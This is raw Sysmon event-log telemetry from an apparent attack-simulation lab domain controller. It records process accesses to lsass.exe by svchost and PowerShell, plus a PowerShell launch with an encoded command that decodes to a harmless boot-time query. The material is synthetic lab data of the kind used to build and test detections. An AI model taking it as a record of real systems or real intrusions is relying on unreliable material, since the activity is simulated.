15:51:53.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002709Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002708Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002707Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.690{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002706Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.690{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002705Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.690{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002704Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.487{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002703Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.487{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002702Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.440{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_zzg2w30g.ffk.ps12020-11-03 15:51:53.440 10341000x80000000000000002701Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.425{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002700Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C99-5FA1-7D00-000000008801}21242252C:\Windows\system32\conhost.exe{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002699Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002698Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002697Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002696Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002695Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002694Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002693Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002692Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002691Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.409{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002690Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002689Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002688Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002687Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.393{D28789B6-7C99-5FA1-7E00-000000008801}41724784C:\Windows\system32\cmd.exe{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002686Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.408{D28789B6-7C99-5FA1-7F00-000000008801}4860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C99-5FA1-8F0D-050000000000}0x50d8f0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C99-5FA1-7E00-000000008801}4172C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMATgBhAG0AZQAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBMAGEAcwB0AEIAbwBvAHQAVQBwAFQAaQBtAGUA 10341000x80000000000000002685Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 